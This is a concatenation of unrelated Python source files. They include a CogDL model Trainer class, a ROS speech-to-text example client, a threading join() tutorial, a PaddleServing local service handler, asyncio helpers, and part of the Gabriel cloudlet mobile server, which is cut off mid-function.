if isinstance(batch, tuple):
batch = list(batch)
for i, x in enumerate(batch):
if torch.is_tensor(x):
batch[i] = x.to(device)
elif isinstance(x, Graph):
x.to(device)
elif torch.is_tensor(batch) or isinstance(batch, Graph):
batch = batch.to(device)
elif hasattr(batch, "apply_to_device"):
batch.apply_to_device(device)
return batch
def clip_grad_norm(params, max_norm):
"""Clips gradient norm."""
if max_norm > 0:
return torch.nn.utils.clip_grad_norm_(params, max_norm)
else:
return torch.sqrt(sum(p.grad.data.norm() ** 2 for p in params if p.grad is not None))
class Trainer(object):
def __init__(
self,
epochs: int,
max_epoch: int = None,
nstage: int = 1,
cpu: bool = False,
checkpoint_path: str = "./checkpoints/model.pt",
resume_training: str = False,
device_ids: Optional[list] = None,
distributed_training: bool = False,
distributed_inference: bool = False,
master_addr: str = "localhost",
master_port: int = 10086,
early_stopping: bool = True,
patience: int = 100,
eval_step: int = 1,
save_emb_path: Optional[str] = None,
load_emb_path: Optional[str] = None,
cpu_inference: bool = False,
progress_bar: str = "epoch",
clip_grad_norm: float = 5.0,
logger: str = None,
log_path: str = "./runs",
project: str = "cogdl-exp",
no_test: bool = False,
actnn: bool = False,
fp16: bool = False,
rp_ratio: int = 1,
):
self.epochs = epochs
self.nstage = nstage
self.patience = patience
self.early_stopping = early_stopping
self.eval_step = eval_step
self.monitor = None
self.evaluation_metric = None
self.progress_bar = progress_bar
if max_epoch is not None:
warnings.warn("The max_epoch is deprecated and will be removed in the future, please use epochs instead!")
self.epochs = max_epoch
self.cpu = cpu
self.devices, self.world_size = self.set_device(device_ids)
self.checkpoint_path = checkpoint_path
self.resume_training = resume_training
self.distributed_training = distributed_training
self.distributed_inference = distributed_inference
self.master_addr = master_addr
self.master_port = master_port
self.cpu_inference = cpu_inference
self.no_test = no_test
self.on_train_batch_transform = None
self.on_eval_batch_transform = None
self.clip_grad_norm = clip_grad_norm
self.save_emb_path = save_emb_path
self.load_emb_path = load_emb_path
self.data_controller = DataController(world_size=self.world_size, distributed=self.distributed_training)
self.logger = build_logger(logger, log_path, project)
self.after_epoch_hooks = []
self.pre_epoch_hooks = []
self.training_end_hooks = []
if distributed_training:
self.register_training_end_hook(ddp_end)
self.register_out_epoch_hook(ddp_after_epoch)
self.eval_data_back_to_cpu = False
self.fp16 = fp16
if actnn:
try:
import actnn
from actnn.conf import config
actnn.set_optimization_level("L3")
if rp_ratio > 1:
config.group_size = 64
except Exception:
pass
def register_in_epoch_hook(self, hook):
self.pre_epoch_hooks.append(hook)
def register_out_epoch_hook(self, hook):
self.after_epoch_hooks.append(hook)
def register_training_end_hook(self, hook):
self.training_end_hooks.append(hook)
def set_device(self, device_ids: Optional[list]):
"""
Return: devices, world_size
"""
if device_ids is None or self.cpu:
return [torch.device("cpu")], 0
if isinstance(device_ids, int) and device_ids > 0:
device_ids = [device_ids]
elif isinstance(device_ids, list):
pass
else:
raise ValueError("`device_id` has to be list of integers")
if len(device_ids) == 0:
return torch.device("cpu"), 0
else:
return [i for i in device_ids], len(device_ids)
def run(self, model_w: ModelWrapper, dataset_w: DataWrapper):
# for network/graph embedding models
if isinstance(model_w, EmbeddingModelWrapper):
return EmbeddingTrainer(self.save_emb_path, self.load_emb_path).run(model_w, dataset_w)
print("Model Parameters:", sum(p.numel() for p in model_w.parameters()))
# for deep learning models
# set default loss_fn and evaluator for model_wrapper
# mainly for in-cogdl setting
model_w.default_loss_fn = dataset_w.get_default_loss_fn()
model_w.default_evaluator = dataset_w.get_default_evaluator()
model_w.set_evaluation_metric()
if self.resume_training:
model_w = load_model(model_w, self.checkpoint_path).to(self.devices[0])
if self.distributed_training:
torch.multiprocessing.set_sharing_strategy("file_system")
self.dist_train(model_w, dataset_w)
else:
self.train(self.devices[0], model_w, dataset_w)
best_model_w = load_model(model_w, self.checkpoint_path).to(self.devices[0])
if self.no_test:
return best_model_w.model
final_test = self.evaluate(best_model_w, dataset_w)
# clear the GPU memory
dataset = dataset_w.get_dataset()
if isinstance(dataset.data, Graph):
dataset.data.to("cpu")
return final_test
def evaluate(self, model_w: ModelWrapper, dataset_w: DataWrapper, cpu=False):
if cpu:
self.devices = [torch.device("cpu")]
# disable `distributed` to inference once only
self.distributed_training = False
dataset_w.prepare_test_data()
final_val = self.validate(model_w, dataset_w, self.devices[0])
final_test = self.test(model_w, dataset_w, self.devices[0])
if final_val is not None and "val_metric" in final_val:
final_val[f"val_{self.evaluation_metric}"] = final_val["val_metric"]
final_val.pop("val_metric")
if "val_loss" in final_val:
final_val.pop("val_loss")
if final_test is not None and "test_metric" in final_test:
final_test[f"test_{self.evaluation_metric}"] = final_test["test_metric"]
final_test.pop("test_metric")
if "test_loss" in final_test:
final_test.pop("test_loss")
self.logger.note(final_test)
if final_val is not None:
final_test.update(final_val)
print(final_test)
return final_test
def dist_train(self, model_w: ModelWrapper, dataset_w: DataWrapper):
mp.set_start_method("spawn", force=True)
device_count = torch.cuda.device_count()
if device_count < self.world_size:
size = device_count
print(f"Available device count ({device_count}) is less than world size ({self.world_size})")
else:
size = self.world_size
print(f"Let's using {size} GPUs.")
processes = []
for rank in range(size):
p = mp.Process(target=self.train, args=(rank, model_w, dataset_w))
p.start()
print(f"Process [{rank}] starts!")
processes.append(p)
for p in processes:
p.join()
def build_optimizer(self, model_w):
opt_wrap = model_w.setup_optimizer()
if isinstance(opt_wrap, list) or isinstance(opt_wrap, tuple):
assert len(opt_wrap) == 2
optimizers, lr_schedulers = opt_wrap
else:
optimizers = opt_wrap
lr_schedulers = None
if not isinstance(optimizers, list):
optimizers = [optimizers]
if lr_schedulers and not isinstance(lr_schedulers, list):
lr_schedulers = [lr_schedulers]
return optimizers, lr_schedulers
def initialize(self, model_w, rank=0, master_addr: str = "localhost", master_port: int = 10008):
if self.distributed_training:
os.environ["MASTER_ADDR"] = master_addr
os.environ["MASTER_PORT"] = str(master_port)
dist.init_process_group("nccl", rank=rank, world_size=self.world_size)
model_w = copy.deepcopy(model_w).to(rank)
model_w = DistributedDataParallel(model_w, device_ids=[rank])
module = model_w.module
model_w, model_ddp = module, model_w
return model_w, model_ddp
else:
return model_w.to(rank), None
def train(self, rank, model_w, dataset_w): # noqa: C901
model_w, _ = self.initialize(model_w, rank=rank, master_addr=self.master_addr, master_port=self.master_port)
self.data_controller.prepare_data_wrapper(dataset_w, rank)
self.eval_data_back_to_cpu = dataset_w.data_back_to_cpu
optimizers, lr_schedulers = self.build_optimizer(model_w)
if optimizers[0] is None:
return
est = model_w.set_early_stopping()
if isinstance(est, str):
est_monitor = est
best_index, compare_fn = evaluation_comp(est_monitor)
else:
assert len(est) == 2
est_monitor, est_compare = est
best_index, compare_fn = evaluation_comp(est_monitor, est_compare)
self.monitor = est_monitor
self.evaluation_metric = model_w.evaluation_metric
best_model_w = None
scaler = GradScaler() if self.fp16 else None
patience = 0
best_epoch = 0
for stage in range(self.nstage):
with torch.no_grad():
pre_stage_out = model_w.pre_stage(stage, dataset_w)
dataset_w.pre_stage(stage, pre_stage_out)
self.data_controller.training_proc_per_stage(dataset_w, rank)
if self.progress_bar == "epoch":
epoch_iter = tqdm(range(1, self.epochs + 1))
epoch_printer = Printer(epoch_iter.set_description, rank=rank, world_size=self.world_size)
else:
epoch_iter = range(1, self.epochs + 1)
epoch_printer = Printer(print, rank=rank, world_size=self.world_size)
self.logger.start()
print_str_dict = dict()
for epoch in epoch_iter:
for hook in self.pre_epoch_hooks:
hook(self)
# inductive setting ..
dataset_w.train()
train_loader = dataset_w.on_train_wrapper()
train_dataset = train_loader.get_dataset_from_loader()
if hasattr(train_dataset, "shuffle"):
train_dataset.shuffle()
training_loss = self.train_step(model_w, train_loader, optimizers, lr_schedulers, rank, scaler)
print_str_dict["Epoch"] = epoch
print_str_dict["train_loss"] = training_loss
val_loader = dataset_w.on_val_wrapper()
if val_loader is not None and epoch % self.eval_step == 0:
# inductive setting ..
dataset_w.eval()
# do validation in inference device
val_result = self.validate(model_w, dataset_w, rank)
if val_result is not None:
monitoring = val_result[self.monitor]
if compare_fn(monitoring, best_index):
best_index = monitoring
best_epoch = epoch
patience = 0
best_model_w = copy.deepcopy(model_w)
else:
patience += 1
if self.early_stopping and patience >= self.patience:
break
print_str_dict[f"val_{self.evaluation_metric}"] = monitoring
if self.distributed_training:
if rank == 0:
epoch_printer(print_str_dict)
self.logger.note(print_str_dict, epoch)
else:
epoch_printer(print_str_dict)
self.logger.note(print_str_dict, epoch)
for hook in self.after_epoch_hooks:
hook(self)
with torch.no_grad():
model_w.eval()
post_stage_out = model_w.post_stage(stage, dataset_w)
dataset_w.post_stage(stage, post_stage_out)
if best_model_w is None:
best_model_w = copy.deepcopy(model_w)
if self.distributed_training:
if rank == 0:
save_model(best_model_w.to("cpu"), self.checkpoint_path, best_epoch)
dist.barrier()
else:
dist.barrier()
else:
save_model(best_model_w.to("cpu"), self.checkpoint_path, best_epoch)
for hook in self.training_end_hooks:
hook(self)
def validate(self, model_w: ModelWrapper, dataset_w: DataWrapper, device):
# ------- distributed training ---------
if self.distributed_training:
return self.distributed_test(model_w, dataset_w.on_val_wrapper(), device, self.val_step)
# ------- distributed training ---------
model_w.eval()
dataset_w.eval()
if self.cpu_inference:
model_w.to("cpu")
_device = "cpu"
else:
_device = device
val_loader = dataset_w.on_val_wrapper()
with torch.no_grad():
result = self.val_step(model_w, val_loader, _device)
model_w.to(device)
return result
def test(self, model_w: ModelWrapper, dataset_w: DataWrapper, device):
# ------- distributed training ---------
if self.distributed_training:
return self.distributed_test(model_w, dataset_w.on_test_wrapper(), device, self.test_step)
# ------- distributed training ---------
model_w.eval()
dataset_w.eval()
if self.cpu_inference:
model_w.to("cpu")
_device = "cpu"
else:
_device = device
test_loader = dataset_w.on_test_wrapper()
if model_w.training_type == "unsupervised":
result = self.test_step(model_w, test_loader, _device)
else:
with torch.no_grad():
result = self.test_step(model_w, test_loader, _device)
model_w.to(device)
return result
def distributed_test(self, model_w: ModelWrapper, loader, rank, fn):
model_w.eval()
# if rank == 0:
if dist.get_rank() == 0:
if self.cpu_inference:
model_w.to("cpu")
_device = "cpu"
else:
_device = rank
with torch.no_grad():
result = fn(model_w, loader, _device)
model_w.to(rank)
object_list = [result]
else:
object_list = [None]
dist.broadcast_object_list(object_list, src=0)
return object_list[0]
def train_step(self, model_w, train_loader, optimizers, lr_schedulers, device, scaler):
model_w.train()
losses = []
if self.progress_bar == "iteration":
train_loader = tqdm(train_loader)
for batch in train_loader:
batch = move_to_device(batch, device)
if hasattr(batch, "train_mask") and batch.train_mask.sum().item() == 0:
continue
if scaler is not None:
with autocast():
loss = model_w.on_train_step(batch)
else:
loss = model_w.on_train_step(batch)
for optimizer in optimizers:
optimizer.zero_grad()
if scaler is not None:
scaler.scale(loss).backward()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model_w.parameters(), self.clip_grad_norm)
for optimizer in optimizers:
if scaler is not None:
scaler.step(optimizer)
else:
optimizer.step()
if scaler is not None:
scaler.update()
losses.append(loss.item())
if lr_schedulers is not None:
for lr_schedular in lr_schedulers:
lr_schedular.step()
return np.mean(losses)
def val_step(self, model_w, val_loader, device):
model_w.eval()
if val_loader is None:
return None
for batch in val_loader:
batch = move_to_device(batch, device)
model_w.on_val_step(batch)
if self.eval_data_back_to_cpu:
move_to_device(batch, "cpu")
return model_w.collect_notes()
def test_step(self, model_w, test_loader, device):
model_w.eval()
if test_loader is None:
return None
for batch in test_loader:
batch = move_to_device(batch, device)
model_w.on_test_step(batch)
if self.eval_data_back_to_cpu:
move_to_device(batch, "cpu")
return model_w.collect_notes()
|
example_client.py
|
#! /usr/bin/env python
from __future__ import print_function
import os
import signal
import sys
import threading
import time
import actionlib
import actionlib_msgs.msg as actionlib_msgs
import rospy
import gcloud_speech_msgs.msg as gcloud_speech_msgs
GoalStatus = actionlib_msgs.GoalStatus
def SpeechToTextSimpleExampleClient():
def DoneCallback(state, result):
print("\n\nDone, state {}, result:\n{}\n".format(state,result))
def ActiveCallback():
print("The goal is now active.\n")
def FeedbackCallback(feedback):
print("{}\n".format(feedback))
global sigint_received
sigint_received = False
def SignalIntHandler(signal, frame):
print("Received SIGINT.")
global sigint_received
sigint_received = True
def DelayedExit(wait_time):
time.sleep(wait_time)
os._exit(0)
signal.signal(signal.SIGINT, SignalIntHandler)
client = actionlib.SimpleActionClient(
"/cogrob/speech_to_text", gcloud_speech_msgs.SpeechToTextAction)
client.wait_for_server()
goal = gcloud_speech_msgs.SpeechToTextGoal()
client.send_goal(goal, done_cb=DoneCallback, active_cb=ActiveCallback,
feedback_cb=FeedbackCallback)
while client.get_state() in [GoalStatus.PENDING, GoalStatus.ACTIVE]:
time.sleep(1)
if sigint_received:
break
if sigint_received:
# Waits for 1 seconds and force kill the program, in case the action server
# is dead already (which is the case in our example launch file).
exit_thread = threading.Thread(target=DelayedExit, args=(1, ))
exit_thread.daemon = True
exit_thread.start()
client.cancel_goal()
client.wait_for_result()
if __name__ == '__main__':
try:
rospy.init_node("gcloud_speech_example_client", anonymous=True)
SpeechToTextSimpleExampleClient()
except rospy.ROSInterruptException:
print("Program interrupted before completion.", file=sys.stderr)
|
join_thread.py
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import threading
# 定义action函数准备作为线程执行体使用
def action(max):
for i in range(max):
print(threading.current_thread().name + " " + str(i))
# 启动子线程
threading.Thread(target=action, args=(100,), name="新线程").start()
for i in range(100):
if i == 20:
jt = threading.Thread(target=action, args=(100,), name="被Join的线程")
jt.start()
# 主线程调用了jt线程的join()方法,主线程
# 必须等jt执行结束才会向下执行
jt.join()
print(threading.current_thread().name + " " + str(i))
|
local_service_handler.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import multiprocessing
#from paddle_serving_server import OpMaker, OpSeqMaker
#from paddle_serving_server import Server as GpuServer
#from paddle_serving_server import Server as CpuServer
from . import util
#from paddle_serving_app.local_predict import LocalPredictor
_LOGGER = logging.getLogger(__name__)
_workdir_name_gen = util.NameGenerator("workdir_")
class LocalServiceHandler(object):
"""
LocalServiceHandler is the processor of the local service, contains
three client types, brpc, grpc and local_predictor.If you use the
brpc or grpc, serveing startup ability is provided.If you use
local_predictor, local predict ability is provided by paddle_serving_app.
"""
def __init__(self,
model_config,
client_type='local_predictor',
workdir="",
thread_num=2,
device_type=-1,
devices="",
fetch_names=None,
mem_optim=True,
ir_optim=False,
available_port_generator=None,
use_profile=False,
precision="fp32",
use_mkldnn=False,
mkldnn_cache_capacity=0,
mkldnn_op_list=None,
mkldnn_bf16_op_list=None):
"""
Initialization of localservicehandler
Args:
model_config: model config path
client_type: brpc, grpc and local_predictor[default]
workdir: work directory
thread_num: number of threads, concurrent quantity.
device_type: support multiple devices. -1=Not set, determined by
`devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu
devices: gpu id list[gpu], "" default[cpu]
fetch_names: get fetch names out of LocalServiceHandler in
local_predictor mode. fetch_names_ is compatible for Client().
mem_optim: use memory/graphics memory optimization, True default.
ir_optim: use calculation chart optimization, False default.
available_port_generator: generate available ports
use_profile: use profiling, False default.
precision: inference precesion, e.g. "fp32", "fp16", "int8"
use_mkldnn: use mkldnn, default False.
mkldnn_cache_capacity: cache capacity of mkldnn, 0 means no limit.
mkldnn_op_list: OP list optimized by mkldnn, None default.
mkldnn_bf16_op_list: OP list optimized by mkldnn bf16, None default.
Returns:
None
"""
if available_port_generator is None:
available_port_generator = util.GetAvailablePortGenerator()
self._model_config = model_config
self._port_list = []
self._device_name = "cpu"
self._use_gpu = False
self._use_trt = False
self._use_lite = False
self._use_xpu = False
self._use_mkldnn = False
self._mkldnn_cache_capacity = 0
self._mkldnn_op_list = None
self._mkldnn_bf16_op_list = None
if device_type == -1:
# device_type is not set, determined by `devices`,
if devices == "":
# CPU
self._device_name = "cpu"
devices = [-1]
else:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 0:
# CPU
self._device_name = "cpu"
devices = [-1]
elif device_type == 1:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 2:
# Nvidia Tensor RT
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
self._use_trt = True
elif device_type == 3:
# ARM CPU
self._device_name = "arm"
devices = [-1]
self._use_lite = True
elif device_type == 4:
# Kunlun XPU
self._device_name = "arm"
devices = [int(x) for x in devices.split(",")]
self._use_lite = True
self._use_xpu = True
else:
_LOGGER.error(
"LocalServiceHandler initialization fail. device_type={}"
.format(device_type))
if client_type == "brpc" or client_type == "grpc":
for _ in devices:
self._port_list.append(available_port_generator.next())
_LOGGER.info("Create ports for devices:{}. Port:{}"
.format(devices, self._port_list))
self._client_type = client_type
self._workdir = workdir
self._devices = devices
self._thread_num = thread_num
self._mem_optim = mem_optim
self._ir_optim = ir_optim
self._local_predictor_client = None
self._rpc_service_list = []
self._server_pros = []
self._use_profile = use_profile
self._fetch_names = fetch_names
self._precision = precision
self._use_mkldnn = use_mkldnn
self._mkldnn_cache_capacity = mkldnn_cache_capacity
self._mkldnn_op_list = mkldnn_op_list
self._mkldnn_bf16_op_list = mkldnn_bf16_op_list
_LOGGER.info(
"Models({}) will be launched by device {}. use_gpu:{}, "
"use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, "
"mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, "
"client_type:{}, fetch_names:{}, precision:{}, use_mkldnn:{}, "
"mkldnn_cache_capacity:{}, mkldnn_op_list:{}, "
"mkldnn_bf16_op_list:{}".format(
model_config, self._device_name, self._use_gpu, self._use_trt,
self._use_lite, self._use_xpu, device_type, self._devices,
self._mem_optim, self._ir_optim, self._use_profile,
self._thread_num, self._client_type, self._fetch_names,
self._precision, self._use_mkldnn, self._mkldnn_cache_capacity,
self._mkldnn_op_list, self._mkldnn_bf16_op_list))
def get_fetch_list(self):
return self._fetch_names
def get_port_list(self):
return self._port_list
def get_client(self, concurrency_idx):
"""
Function get_client is only used for local predictor case, creates one
LocalPredictor object, and initializes the paddle predictor by function
load_model_config.The concurrency_idx is used to select running devices.
Args:
concurrency_idx: process/thread index
Returns:
_local_predictor_client
"""
#checking the legality of concurrency_idx.
device_num = len(self._devices)
if device_num <= 0:
_LOGGER.error("device_num must be not greater than 0. devices({})".
format(self._devices))
raise ValueError("The number of self._devices error")
if concurrency_idx < 0:
_LOGGER.error("concurrency_idx({}) must be one positive number".
format(concurrency_idx))
concurrency_idx = 0
elif concurrency_idx >= device_num:
concurrency_idx = concurrency_idx % device_num
_LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format(
concurrency_idx, device_num))
from paddle_serving_app.local_predict import LocalPredictor
if self._local_predictor_client is None:
self._local_predictor_client = LocalPredictor()
# load model config and init predictor
self._local_predictor_client.load_model_config(
model_path=self._model_config,
use_gpu=self._use_gpu,
gpu_id=self._devices[concurrency_idx],
use_profile=self._use_profile,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim,
use_trt=self._use_trt,
use_lite=self._use_lite,
use_xpu=self._use_xpu,
precision=self._precision,
use_mkldnn=self._use_mkldnn,
mkldnn_cache_capacity=self._mkldnn_cache_capacity,
mkldnn_op_list=self._mkldnn_op_list,
mkldnn_bf16_op_list=self._mkldnn_bf16_op_list)
return self._local_predictor_client
def get_client_config(self):
return os.path.join(self._model_config, "serving_server_conf.prototxt")
def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim,
ir_optim, precision):
"""
According to self._device_name, generating one Cpu/Gpu/Arm Server, and
setting the model config amd startup params.
Args:
workdir: work directory
port: network port
gpuid: gpu id
thread_num: thread num
mem_optim: use memory/graphics memory optimization
ir_optim: use calculation chart optimization
precision: inference precison, e.g."fp32", "fp16", "int8"
Returns:
server: CpuServer/GpuServer
"""
if self._device_name == "cpu":
from paddle_serving_server import OpMaker, OpSeqMaker, Server
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
else:
#gpu or arm
from paddle_serving_server import OpMaker, OpSeqMaker, Server
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
if gpuid >= 0:
server.set_gpuid(gpuid)
# TODO: support arm or arm + xpu later
server.set_device(self._device_name)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_precision(precision)
server.load_model_config(self._model_config)
server.prepare_server(
workdir=workdir, port=port, device=self._device_name)
if self._fetch_names is None:
self._fetch_names = server.get_fetch_list()
return server
def _start_one_server(self, service_idx):
"""
Start one server
Args:
service_idx: server index
Returns:
None
"""
self._rpc_service_list[service_idx].run_server()
def prepare_server(self):
"""
Prepare all servers to be started, and append them into list.
"""
for i, device_id in enumerate(self._devices):
if self._workdir != "":
workdir = "{}_{}".format(self._workdir, i)
else:
workdir = _workdir_name_gen.next()
self._rpc_service_list.append(
self._prepare_one_server(
workdir,
self._port_list[i],
device_id,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim,
precision=self._precision))
def start_server(self):
"""
Start multiple processes and start one server in each process
"""
for i, _ in enumerate(self._rpc_service_list):
p = multiprocessing.Process(
target=self._start_one_server, args=(i, ))
p.daemon = True
self._server_pros.append(p)
for p in self._server_pros:
p.start()
|
async_tools.py
|
import asyncio
import functools
from threading import Thread, enumerate
import concurrent.futures
def start_event_loop_new_thread() -> asyncio.AbstractEventLoop:
"""
Creates and starts a new event loop in a new thread
Returns
-------
loop : asyncio.AbstractEventLoop
The newly created loop
"""
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop,), daemon=True)
t.start()
return loop
def stop_event_loop_new_thread(loop: asyncio.AbstractEventLoop) -> None:
"""
Takes an event loop, stops it and once stopped closes it
Parameters
----------
loop : asyncio.AbstractEventLoop
The loop to stop and close
"""
thread_id = loop._thread_id
loop.call_soon_threadsafe(loop.stop)
threads = enumerate()
match = [thread for thread in threads if thread.ident == thread_id]
if len(match) == 1:
match[0].join(timeout=1)
def start_background_loop(loop: asyncio.AbstractEventLoop) -> None:
"""
Sets and starts the event loop
Parameters
----------
loop : asyncio.AbstractEventLoop
The event loop to use
"""
asyncio.set_event_loop(loop)
loop.run_forever()
def run_in_executor(f):
"""
Passes a synchronous & blocking function off to another thread so that it can be awaited
Parameters
----------
f
The function to transform into an awaitable
Returns
-------
inner : callable
An awaitable version of the function with the execution delegated to another thread
"""
@functools.wraps(f)
def inner(*args, **kwargs):
loop = asyncio.get_running_loop()
return loop.run_in_executor(
# If the function to be wrapped has been provided with a thread pool use that, otherwise create one
kwargs.get("thread_pool", ThreadPool(5).thread_pool),
lambda: f(*args, **kwargs),
)
return inner
class ThreadPool:
"""
Creates a class which has a thread pool.
"""
def __init__(self, max_workers):
self.thread_pool = concurrent.futures.ThreadPoolExecutor(
max_workers=max_workers
)
|
mobile_server.py
|
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
#
# Author: Kiryong Ha <krha@cmu.edu>
# Zhuo Chen <zhuoc@cs.cmu.edu>
#
# Copyright (C) 2011-2013 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import multiprocessing
import os
import queue
import select
import socket
import socketserver
import struct
import sys
import threading
import time
import traceback
import base64
import gabriel
LOG = gabriel.logging.getLogger(__name__)
image_queue_list = list()
acc_queue_list = list()
audio_queue_list = list()
gps_queue_list = list()
# a global queue that contains final messages sent back to the client
result_queue = multiprocessing.Queue()
# a global queue that contains control messages to be sent to the client
command_queue = multiprocessing.Queue()
# a global queue used to publish input streams in a web server for debugging purposes
input_display_queue = multiprocessing.Queue(1)
# a global queue used to publish output streams in a web server for debugging purposes
output_display_queue_dict = {'image': multiprocessing.Queue(1),
'debug': multiprocessing.Queue(1),
'text': multiprocessing.Queue(3),
'video': multiprocessing.Queue(3)}
class MobileCommError(Exception):
pass
class MobileSensorHandler(gabriel.network.CommonHandler):
def setup(self):
super(MobileSensorHandler, self).setup()
if gabriel.Debug.LOG_STAT:
self.init_connect_time = None
self.previous_time = None
def handle(self):
LOG.info("Mobile client is connected for (%s)" % str(self))
if gabriel.Debug.LOG_STAT:
self.init_connect_time = time.time()
self.previous_time = time.time()
super(MobileSensorHandler, self).handle()
class MobileControlHandler(MobileSensorHandler):
'''
The control server that
1) Receive control messages from client (e.g. ping to synchronize time)
2) Delivers sensor control messages from the applications
'''
def setup(self):
super(MobileControlHandler, self).setup()
# flush out old result at Queue
while not command_queue.empty():
command_queue.get()
self.data_queue = command_queue
def __repr__(self):
return "Mobile Control Server"
def _handle_input_data(self):
## receive data
header_size = struct.unpack("!I", self._recv_all(4))[0]
header_data = self._recv_all(header_size)
header_json = json.loads(header_data)
# if "sync_time" field exists in the header, then this is a time sync request
# and a local time is returned immediately
if header_json.get("sync_time") is not None:
header_json["sync_time"] = int(time.time() * 1000) # in millisecond
header_data = json.dumps(header_json)
packet = struct.pack("!I%ds" % len(header_data), len(header_data), header_data)
self.request.send(packet)
self.wfile.flush()
return
def _handle_queue_data(self):
try:
cmd_data = self.data_queue.get(timeout = 0.0001)
cmd_json = json.loads(cmd_data)
if isinstance(cmd_json, list):
for cmd_j in cmd_json:
cmd_data = json.dumps(cmd_j)
packet = struct.pack("!I%ds" % len(cmd_data), len(cmd_data), cmd_data)
self.request.send(packet)
self.wfile.flush()
LOG.info("command sent to mobile device: %s", cmd_data)
else:
## send return data to the mobile device
packet = struct.pack("!I%ds" % len(cmd_data), len(cmd_data), cmd_data)
self.request.send(packet)
self.wfile.flush()
LOG.info("command sent to mobile device: %s", cmd_data)
except queue.Empty:
LOG.warning("data queue shouldn't be empty! - %s" % str(self))
class MobileVideoHandler(MobileSensorHandler):
'''
The video stream server that
1) takes MJPEG streams as input, and
2) put the image data into queues that are then sent to different cognitive engines
Optionally, it can also syncronize time with client
'''
def setup(self):
super(MobileVideoHandler, self).setup()
if gabriel.Debug.LOG_STAT:
self.frame_count = 0
self.total_recv_size = 0
if gabriel.Debug.SAVE_IMAGES:
if not os.path.exists(gabriel.Const.LOG_IMAGES_PATH):
os.makedirs(gabriel.Const.LOG_IMAGES_PATH)
self.log_images_counter = 0
self.log_images_timing = open(os.path.join(gabriel.Const.LOG_IMAGES_PATH, "timing.txt"), "w")
if gabriel.Debug.SAVE_VIDEO:
self.log_video_writer_created = False
def __repr__(self):
return "Mobile Video Server"
def _handle_input_data(self):
## receive data
header_size = struct.unpack("!I", self._recv_all(4))[0]
header_data = self._recv_all(header_size)
image_size = struct.unpack("!I", self._recv_all(4))[0]
image_data = self._recv_all(image_size)
## the gabriel test app that does nothing...
if gabriel.Debug.DIRECT_RETURN:
packet = struct.pack("!I%ds" % len(header_data),
len(header_data), header_data)
self.request.send(packet)
self.wfile.flush()
## add header data for measurement
if gabriel.Debug.TIME_MEASUREMENT:
header_json = json.loads(header_data)
header_json[gabriel.Protocol_measurement.JSON_KEY_CONTROL_RECV_FROM_MOBILE_TIME] = time.time()
header_data = json.dumps(header_json)
## stats
if gabriel.Debug.LOG_STAT:
self.frame_count += 1
current_time = time.time()
self.total_recv_size += (header_size + image_size + 8)
current_FPS = 1 / (current_time - self.previous_time)
self.previous_time = current_time
average_FPS = self.frame_count / (current_time - self.init_connect_time)
if (self.frame_count % 100 == 0):
log_msg = "Video FPS : current(%f), avg(%f), BW(%f Mbps), offloading engine(%d)" % \
(current_FPS, average_FPS, 8 * self.total_recv_size / (current_time - self.init_connect_time) / 1000 / 1000, len(image_queue_list))
LOG.info(log_msg)
## put current image data in all registered cognitive engine queue
for image_queue in image_queue_list:
if image_queue.full():
try:
image_queue.get_nowait()
except queue.Empty as e:
pass
try:
image_queue.put_nowait((header_data, image_data))
except queue.Full as e:
pass
## display input stream for debug purpose
if gabriel.Debug.WEB_SERVER:
if input_display_queue.full():
try:
input_display_queue.get_nowait()
except queue.Empty as e:
pass
try:
input_display_queue.put_nowait(image_data)
except queue.Full as e:
pass
## write images into files
if gabriel.Debug.SAVE_IMAGES:
self.log_images_counter += 1
